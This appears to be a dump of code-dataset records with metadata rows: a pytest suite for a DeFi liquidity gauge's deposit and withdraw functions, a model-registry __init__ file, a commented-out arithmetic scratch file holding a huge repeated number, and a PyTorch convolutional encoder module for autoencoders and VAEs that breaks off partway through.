| 62.716012 | 155 | 0.769738 | 1,932 | 20,759 | 8.103002 | 0.0647 | 0.090259 | 0.015522 | 0.012775 | 0.927435 | 0.90099 | 0.890131 | 0.881763 | 0.873778 | 0.873778 | 0 | 0.025927 | 0.136037 | 20,759 | 330 | 156 | 62.906061 | 0.846947 | 0.008189 | 0 | 0.82197 | 0 | 0 | 0.062479 | 0.027741 | 0 | 0 | 0 | 0 | 0.401515 | 1 | 0.037879 | false | 0 | 0.018939 | 0 | 0.060606 | 0.003788 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
31f322c09f463cf1af2901f181ad2c2644e6fc69 | 2,749 | py | Python | tests/unitary/LiquidityGaugeV5Collateral/test_deposit_withdraw.py | hedgx/ribbonomics | 84a212a82eaaa2824ebe3c072413e143eaca02a2 | [
"MIT"
] | null | null | null | tests/unitary/LiquidityGaugeV5Collateral/test_deposit_withdraw.py | hedgx/ribbonomics | 84a212a82eaaa2824ebe3c072413e143eaca02a2 | [
"MIT"
] | null | null | null | tests/unitary/LiquidityGaugeV5Collateral/test_deposit_withdraw.py | hedgx/ribbonomics | 84a212a82eaaa2824ebe3c072413e143eaca02a2 | [
"MIT"
] | null | null | null | import brownie
import pytest
@pytest.fixture(scope="module", autouse=True)
def deposit_setup(accounts, gauge_v5_collateral, mock_lp_token):
mock_lp_token.approve(gauge_v5_collateral, 2 ** 256 - 1, {"from": accounts[0]})
def test_deposit(accounts, gauge_v5_collateral, mock_lp_token):
balance = mock_lp_token.balanceOf(accounts[0])
gauge_v5_collateral.deposit(100000, {"from": accounts[0]})
assert mock_lp_token.balanceOf(gauge_v5_collateral) == 100000
assert mock_lp_token.balanceOf(accounts[0]) == balance - 100000
assert gauge_v5_collateral.totalSupply() == 100000
assert gauge_v5_collateral.balanceOf(accounts[0]) == 100000
def test_deposit_zero(accounts, gauge_v5_collateral, mock_lp_token):
balance = mock_lp_token.balanceOf(accounts[0])
gauge_v5_collateral.deposit(0, {"from": accounts[0]})
assert mock_lp_token.balanceOf(gauge_v5_collateral) == 0
assert mock_lp_token.balanceOf(accounts[0]) == balance
assert gauge_v5_collateral.totalSupply() == 0
assert gauge_v5_collateral.balanceOf(accounts[0]) == 0
def test_deposit_insufficient_balance(accounts, gauge_v5_collateral, mock_lp_token):
with brownie.reverts():
gauge_v5_collateral.deposit(100000, {"from": accounts[1]})
def test_withdraw(accounts, gauge_v5_collateral, mock_lp_token):
balance = mock_lp_token.balanceOf(accounts[0])
gauge_v5_collateral.deposit(100000, {"from": accounts[0]})
gauge_v5_collateral.withdraw(100000, {"from": accounts[0]})
assert mock_lp_token.balanceOf(gauge_v5_collateral) == 0
assert mock_lp_token.balanceOf(accounts[0]) == balance
assert gauge_v5_collateral.totalSupply() == 0
assert gauge_v5_collateral.balanceOf(accounts[0]) == 0
def test_withdraw_zero(accounts, gauge_v5_collateral, mock_lp_token):
balance = mock_lp_token.balanceOf(accounts[0])
gauge_v5_collateral.deposit(100000, {"from": accounts[0]})
gauge_v5_collateral.withdraw(0, {"from": accounts[0]})
assert mock_lp_token.balanceOf(gauge_v5_collateral) == 100000
assert mock_lp_token.balanceOf(accounts[0]) == balance - 100000
assert gauge_v5_collateral.totalSupply() == 100000
assert gauge_v5_collateral.balanceOf(accounts[0]) == 100000
def test_withdraw_new_epoch(accounts, chain, gauge_v5_collateral, mock_lp_token):
balance = mock_lp_token.balanceOf(accounts[0])
gauge_v5_collateral.deposit(100000, {"from": accounts[0]})
chain.sleep(86400 * 400)
gauge_v5_collateral.withdraw(100000, {"from": accounts[0]})
assert mock_lp_token.balanceOf(gauge_v5_collateral) == 0
assert mock_lp_token.balanceOf(accounts[0]) == balance
assert gauge_v5_collateral.totalSupply() == 0
assert gauge_v5_collateral.balanceOf(accounts[0]) == 0
| 39.84058 | 84 | 0.75773 | 371 | 2,749 | 5.283019 | 0.110512 | 0.114286 | 0.277551 | 0.153061 | 0.865306 | 0.865306 | 0.865306 | 0.807143 | 0.807143 | 0.807143 | 0 | 0.071191 | 0.126228 | 2,749 | 68 | 85 | 40.426471 | 0.744796 | 0 | 0 | 0.659574 | 0 | 0 | 0.016733 | 0 | 0 | 0 | 0 | 0 | 0.425532 | 1 | 0.148936 | false | 0 | 0.042553 | 0 | 0.191489 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ee0de17a5e167480e16ba6c31b15fa265fc9d519 | 176 | py | Python | theseus/classification/models/__init__.py | kaylode/mediaeval21-vsa | 8c5e7d612393d511331124931843c2ed07192c1b | [
"MIT"
] | 1 | 2021-12-12T18:14:55.000Z | 2021-12-12T18:14:55.000Z | theseus/classification/models/__init__.py | kaylode/mediaeval21-vsa | 8c5e7d612393d511331124931843c2ed07192c1b | [
"MIT"
] | null | null | null | theseus/classification/models/__init__.py | kaylode/mediaeval21-vsa | 8c5e7d612393d511331124931843c2ed07192c1b | [
"MIT"
] | null | null | null | from theseus.base.models import MODEL_REGISTRY
from .timm_models import *
from .metavit import MetaVIT
MODEL_REGISTRY.register(BaseTimmModel)
MODEL_REGISTRY.register(MetaVIT) | 25.142857 | 46 | 0.852273 | 23 | 176 | 6.347826 | 0.478261 | 0.267123 | 0.287671 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085227 | 176 | 7 | 47 | 25.142857 | 0.906832 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ee18962f755c93d448f472b499ec0eca11a569e7 | 27,624 | py | Python | numbers.py | iAreth/arm | 5d316ddaa5ae19f0ce972810913aa79cbcb83e05 | [
"Apache-2.0"
] | null | null | null | numbers.py | iAreth/arm | 5d316ddaa5ae19f0ce972810913aa79cbcb83e05 | [
"Apache-2.0"
] | null | null | null | numbers.py | iAreth/arm | 5d316ddaa5ae19f0ce972810913aa79cbcb83e05 | [
"Apache-2.0"
] | null | null | null | # Suma, multiplicacion, division
# _one = 10+10000+25660123021034+62
# print(+ _one + 33242301344534534345345353434534534534534534534543534543020033324230134453453434534535332423013445345342423013445345342423013445345342423013445345342423013445345342423013445345342423013445345342423013445345342423013445345342423013445345342423013445345342423013445345342423013445345342423013445345342423013445345342423013445345342423013445345342423013445345342423013445345343453453534345345345345345345345435345430200354353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453433242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453433242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200353534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200333242301344534534345345353434534534534534534534543534543020033324230134453453434534535343453453453453453453454353454302003332423013445345343453453534345345345345345345345435345430200335345430200334534535343453453453453453453454353454302003)
# print(type(_one))
| 4,604 | 27,533 | 0.998769 | 14 | 27,624 | 1,970.5 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.997465 | 0.000579 | 27,624 | 5 | 27,534 | 5,524.8 | 0.001775 | 0.999638 | 0 | null | 0 | null | 0 | 0 | null | 1 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
ee1e5cfa896f663a00d18bd3534e8697b0a51feb | 4,748 | py | Python | Autoencoders/encoders.py | ngroebner/Autoencoders | 49105c4aba2959c6973aeba41b9df4eb012f44ac | [
"MIT"
] | 1 | 2021-07-23T13:07:11.000Z | 2021-07-23T13:07:11.000Z | Autoencoders/encoders.py | ngroebner/Autoencoders | 49105c4aba2959c6973aeba41b9df4eb012f44ac | [
"MIT"
] | null | null | null | Autoencoders/encoders.py | ngroebner/Autoencoders | 49105c4aba2959c6973aeba41b9df4eb012f44ac | [
"MIT"
] | null | null | null | import numpy as np
import torch
from torch import nn, optim
from torch.nn import functional as F
from Autoencoders.layers import Flatten
class Encoder2DConv(nn.Module):
"""Constructs an encoder for use in various autoencoder models.
TODO: Consider passing a list to designate the number of convolutional
filters per layer.
TODO: Create another class for dilated convolutions and
causal dilated convolutions.
TODO: Add blocks and residuals? - Maybe better for a different class.
Args:
latentdims (int): Number of dimensions in the latent space
nchannels (int): Number of channels in the input data.
Default = 1.
nfilters (int): Number of filters in each layer.
Default is 32.
"""
def __init__(
self,
inputdims,
latentdims,
nlayers=2,
nchannels=1,
nfilters=32,
kernel_size=3,
stride=1,
padding=1,
use_batchnorm=False
):
super(Encoder2DConv, self).__init__()
#arguments to Conv2D:
# in_channels, out_channels, kernel_size,
# stride, padding, dilation, groups, bias,
# padding-mode
self.nchannels = nchannels
self.kernel_size = kernel_size
self.stride = stride
self.inputdims = inputdims
# string together arbitrary number of convolutional layers
convlayers = []
for layer in range(nlayers):
if layer == 0:
#first layer, in_channels = nchannels
convlayers.append(nn.Conv2d(nchannels, nfilters, kernel_size, stride, padding))
if use_batchnorm:
convlayers.append(nn.BatchNorm2d(nfilters))
convlayers.append(nn.ReLU())
else:
convlayers.append(nn.Conv2d(nfilters, nfilters, kernel_size, stride, padding))
convlayers.append(nn.ReLU())
self.convlayers = nn.Sequential(*convlayers)
self.flatten = Flatten()
self.latent = nn.Linear(nfilters*inputdims[0]*inputdims[1], latentdims)
def forward(self, x):
x = self.convlayers(x)
x = self.flatten(x)
return self.latent(x)
class VAEEncoder2DConv(nn.Module):
"""Constructs an encoder for use in various autoencoder models.
TODO: Consider passing a list to designate the number of convolutional
filters per layer.
TODO: Create another class for dilated convolutions and
causal dilated convolutions.
TODO: Add blocks and residuals? - Maybe better for a different class.
Initializing the linear layers with xavier_normal prevents KL loss explosion. E.g.:
def init_weights(m):
if type(m) == nn.Linear:
nn.init.xavier_normal(m.weight)
Args:
latentdims (int): Number of dimensions in the latent space
nchannels (int): Number of channels in the input data.
Default = 1.
nfilters (int): Number of filters in each layer.
Default is 32.
"""
def __init__(
self,
inputdims,
latentdims,
nlayers=2,
nchannels=1,
nfilters=32,
kernel_size=3,
stride=1,
padding=1,
use_batchnorm=False
):
super(VAEEncoder2DConv, self).__init__()
#arguments to Conv2D:
# in_channels, out_channels, kernel_size,
# stride, padding, dilation, groups, bias,
# padding-mode
self.nchannels = nchannels
self.kernel_size = kernel_size
self.stride = stride
self.inputdims = inputdims
# string together arbitrary number of convolutional layers
convlayers = []
for layer in range(nlayers):
if layer == 0:
#first layer, in_channels = nchannels
convlayers.append(nn.Conv2d(nchannels, nfilters, kernel_size, stride, padding))
if use_batchnorm:
convlayers.append(nn.BatchNorm2d(nfilters))
convlayers.append(nn.ReLU())
else:
convlayers.append(nn.Conv2d(nfilters, nfilters, kernel_size, stride, padding))
convlayers.append(nn.ReLU())
self.convlayers = nn.Sequential(*convlayers)
self.flatten = Flatten()
self.mu = nn.Linear(nfilters*inputdims[0]*inputdims[1], latentdims)
self.logvar = nn.Linear(nfilters*inputdims[0]*inputdims[1], latentdims)
def forward(self, x):
x = self.convlayers(x)
x = self.flatten(x)
